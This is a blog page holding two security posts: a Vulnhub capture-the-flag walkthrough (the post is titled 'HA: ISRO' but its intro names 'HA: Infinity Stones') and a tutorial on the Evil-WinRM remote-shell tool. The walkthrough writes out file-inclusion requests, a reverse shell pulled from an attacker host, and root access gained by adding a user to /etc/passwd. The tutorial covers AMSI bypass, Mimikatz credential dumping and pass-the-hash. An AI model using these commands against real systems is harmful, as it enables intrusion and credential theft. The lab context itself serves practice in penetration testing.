Saturday, June 13, 2020

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.
Download Here
Level: Intermediate
Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Bruteforce
  • Exploitation
    • LFI
    • Create PHP reverse shell
    • Reading /etc/passwd file
    • Getting a reverse connection
    • Spawning a TTY Shell
  • Privilege Escalation
    • Writable etc/passwd File

Walkthrough

Scanning Network

Firsts of all we try to identify our target and for this use the following command:
netdiscover
Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:
nmap -A 192.168.1.104

Enumeration

With the help of help scan, we now know that port number 22, 80 are open with the service of SSH, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image:
http://192.168.1.104
It opened a webpage as shown in the above image. Here we found the Bhaskara page, so now we opened and found an information webpage there as shown in the image below:
http://192.168.1.104/bhaskara.html
As a convention, we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.
Now we got to decode it. To do this we will be using the combination of the echo command and the base64 -d.
echo "L2JoYXNrYXJh" 1 base64 -d
After decoding the base64 encoded text we get “/bhaskara”. This seems a hint that there might be a directory named bhaskara.
So, we went on to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.
Now in order to crack this file, we are going to use extract its hash using the true.py. You can download the true.py from this link. We named the file as true.py and ran it and it gave us the password as xavier.
python true.py bhaskara > hashes
john hashes --show
Now as we knew it was a TrueCrypt file. That means it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing it path and selecting a volume as shown in the given image. 
Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’ 
 It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.
Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}
Now let’s move forward in Enumeration. We also performed a directory scan. This gave us an /img directory. We performed an extension directory scan. It gave us a connect.php.
dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php
We went into the /img directory. Here we found an image called aryabhata.jpg.
We will download the aryabhata.jpg and opened it.  
Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.
As we couldn’t find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag. 
steghide extract -sf aryabhata.jpg
cat flag.txt
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the Web Browser, we also found a connect.php in our drib directory bruteforce. This gave us nothing. Then we realized that this can be command injection. Now to test we tried opening the etc/passwd file through it. As seen in the image given below, we see that it’s a File Inclusion Vulnerability.
192.168.1.104/connect.php?file=/etc/passwd
We edited our shell.php, to enter the attacker machine IP address. And then closed the file after saving it. Now we need to send this to the target machine. Hence, we started a python http server using the one-liner showed below.
nano shell.php
python -m SimpleHTTPServer
We are gonna capture a reverse connection using the netcat. So we need to initiate a listener on the port mentioned in the shell file.
nc -lvp 1234
After starting the listener on the target machine, we will run the shell on the target machine using the File Inclusion Vulnerability.
192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php
Upon execution, the shell gave us a session to the target machine. As seen in the image given below, it wasn’t a proper shell. So, we needed a python one liner to convert it into a proper shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
We used netstat command to check for the IP address and ports the target machine is listening on and found that a web service (3306) is allowed for localhost only. The most common service to run on the port 3306 is MySQL. Let’s enumerate in that direction.
netstat -antp
We tried to login in the MySQL database as the root user. After logging in the MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of flag database. Here we found our second flag Mangalyaan Flag.
mysql -u root 
show databases;
use flag;
show tables;
select * from flag;
Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.
ls -la /etc/passwd
Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.
openssl passwd -1 -salt user3 pass123
Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now, all we got to do is run su command with the user name we just created and enter the password and we have the root shell. We traversed inside the root directory to find our final flag, Chandrayaan Flag.
echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt
Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2} 

at No comments:

Wednesday, June 10, 2020

Evil-Winrm : Winrm Pentesting Framework


In this post, we will discuss the most famous framework for PS Remote shell hacking tool named as “Evil-Winrm”. It is an opensource tool which is available on GitHub for winrm penetration testing.

Table of Content

  • Evil-winrm
  • Features
  • Installation
  • Load PowerShell scripts
  • Pass the Hash
  • Install using its Docker image

Evil-winrm

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but most of its features are focused on hacking/pentesting stuff.
Features
  • Compatible to Linux and Windows client systems
  • Load in memory Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) assemblies bypassing some AVs
  • Load x64 payloads generated with awesome donut technique
  • AMSI Bypass
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files showing a progress bar
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files completion
  • Colorization on prompt and output messages (can be disabled optionally)
  • Docker support (prebuilt images available at Dockerhub)
  • Trap capturing to avoid accidental shell exit on Ctrl+C

Installation 

In the post, we have discussed two easy methods to install winrm in your Kali Linux, you will find more method for installation from GitHub.
With the help of Ruby gem, you can directly install the evil-winrm, it will automatically install all dependency in your machine by executing following command.
gem install evil-winrm
once it will get installed you can pull its HELP option by typing ‘evil-winrm’ that will display the syntax and other operators for executing evil-winrm against windows remote management service.
Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. As a result, it will give the access of victim shell by providing its Powershell as given below.
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'
It will not only provide a shell of the host machine but also provide a menu to load function such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

So we have some pen testing powershell script in the /root/powershell and we can upload this ps1 script through evil winrm on the host machine.
The .PS1 scripts must be in the path set at -s argument and execute this as given below:
Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’> -s <path>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell
Type menu again and see the loaded functions and use Bypass 4MSI then Invoke the script. Here we have tried to upload mimikatz PowerShell script to dump stored credential.
menu
Bypass 4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
As a result, it has dumped all the credential of the Windows Server. ðŸ˜ˆ

Pass the Hash

It has one more feature which allows you to conduct Pass the HASH attack and as a result it gives the shell of the host machine.

Install using its Docker image

This is a very easy and convenient method to install winrm on your attacking machine and simultaneously provide the shell of the victim machine by compromising it winrm service. Only you need to execute the following command.
docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'
+------------------------------------------------- This is only an educational purposes only I am not responsible for further activities Join my forum and learn more ethical hacking and penetration testing https://t.me/WhiteHatHacks Get me at alex14324.blogspot.com https://t.me/alex14324 https://github.com/alex14324 https://discord.gg/6NPtGxZ
-------------------------------------------------------+
at No comments:
Subscribe to: Posts (Atom)

How VPN Technology Protects Your Privacy from Hackers

  Introduction Picture this; the year is 2020. People store their most sensitive data online. They blindly trust that their information is s...

  • Multiple Ways to Install Kali
    In this article, we will learn how to open the magic box of ethical hacking. Can you guess the name of that box? Ok, I tell you the name i...
  • MuzzyBox : Vulnhub Walkthrough
    Introduction Today we are going to crack this machine called MuzzyBox. It was created by Muzzy. Duh! This is a Capture the Flag type of ...